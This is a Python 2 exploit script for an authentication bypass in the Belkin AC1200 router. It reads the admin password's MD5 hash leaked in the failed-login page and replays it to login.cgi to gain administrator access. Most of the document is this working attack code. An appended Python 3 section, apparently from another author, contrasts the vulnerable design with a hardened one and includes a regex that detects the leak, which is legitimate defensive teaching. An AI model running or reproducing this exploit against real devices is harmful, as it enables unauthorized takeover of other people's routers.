#!/usr/bin/python
'''
# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
# Date: 5/11/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.belkin.com
# Version: Firmware: 1.00.27
# Tested on: F9K1113 v1

#1. Description:
#The Belkin AC1200 is vulnerable to authentication bypass due to it performing client side
#authentication after you attempt to login after already having failed a login. That webpage,
#loginpserr.stm, contains the md5 hash value of the administrator's password. This can be
#exploited by extracting that hash value and passing it in the pws field in a POST request to
#login.cgi.
#I would like to note that I contacted Belkin on several occasions
#and gave them plenty of time to reply/fix the issue before releasing this entry.

#2. Proof:
#Line 55 of loginpserr.stm contains the javascript code:
#var password = "md5hashofpassword";

#3. Exploit:
'''
import urllib
import urllib2
import sys

router = raw_input('Enter IP address of your AC1200 to test: ')
page = urllib2.urlopen('http://'+router+'/loginpserr.stm').read()
test_page = page
vuln_string = 'var password = "'

if vuln_string in test_page:
    print 'Router is vulnerable.'
    answer = raw_input('Would you like to exploit the target? Y/N : ')
else:
    print 'Router is not vulnerable.'
    print 'exiting...'
    sys.exit()

if (answer == 'y') or (answer == 'Y'):
    extract = test_page.split(vuln_string, 1)[1]   #These two lines extract the leaked hash value
    _hash = extract.partition('"')[0]              #from /loginpserr.stm using quotes as a delimiter
else:
    #Any answer other than Y/y exits here; the original fell through to the POST with _hash undefined
    print 'exiting...'
    sys.exit()

#Assemble the POST request to /login.cgi
headers = {
    'Host': router,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://'+router+'/',
    'Content-Type': 'application/x-www-form-urlencoded'
}
data = {
    'totalMSec': '0',
    'pws': _hash,
    'url': 'status.stm',
    'arc_action': 'login',
    'pws_temp': ''
}
data = urllib.urlencode(data)

#Sends the POST request with the hash in the pws field
req = urllib2.Request('http://'+router+'/login.cgi', data, headers)
response = urllib2.urlopen(req)
the_page = response.read()
print 'Exploit successful.'
print 'You are now free to navigate to http://'+router+'/ ...as admin ;)'
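The root cause described in the advisory is two design errors combined: the error page ships the stored hash to the browser, and login.cgi accepts that hash itself as the credential. The following Python 3 model is an added illustration, not the advisory's code and not Belkin's firmware; the sample password, the salt and all function names are constructed, and the hardened variant assumes the login form is served over TLS so the plaintext password is protected in transit.

```python
import hashlib
import hmac
import os
import re

# Constructed sample credential for the model; not a real router value.
ADMIN_PASSWORD = "correct horse"
ADMIN_MD5 = hashlib.md5(ADMIN_PASSWORD.encode()).hexdigest()


# --- Vulnerable design (the behaviour the advisory describes) ---
def vulnerable_error_page():
    """loginpserr.stm: the comparison runs in the browser, so the page carries the hash."""
    return '<script>var password = "%s";</script>' % ADMIN_MD5


def vulnerable_login_cgi(pws):
    """login.cgi: 'pws' is compared to the stored hash, so the hash itself is the credential."""
    return pws == ADMIN_MD5


# --- Hardened design ---
_SALT = os.urandom(16)  # constructed per-run salt for the model
_STORED = hashlib.pbkdf2_hmac("sha256", ADMIN_PASSWORD.encode(), _SALT, 100_000)


def hardened_error_page():
    """The failure page carries no secret material at all."""
    return "<p>Login failed.</p>"


def hardened_login_cgi(password):
    """Server derives the verifier from the submitted password and compares in constant time;
    a leaked verifier is no longer usable as a credential."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)
    return hmac.compare_digest(candidate, _STORED)


def leaked_hash(page):
    """Defender-side check: scan a fetched error page for the leak pattern; returns the hash or None."""
    m = re.search(r'var password = "([0-9a-f]{32})"', page)
    return m.group(1) if m else None
```

`leaked_hash` is the check to run against a device's failed-login page when assessing whether firmware still exhibits this disclosure.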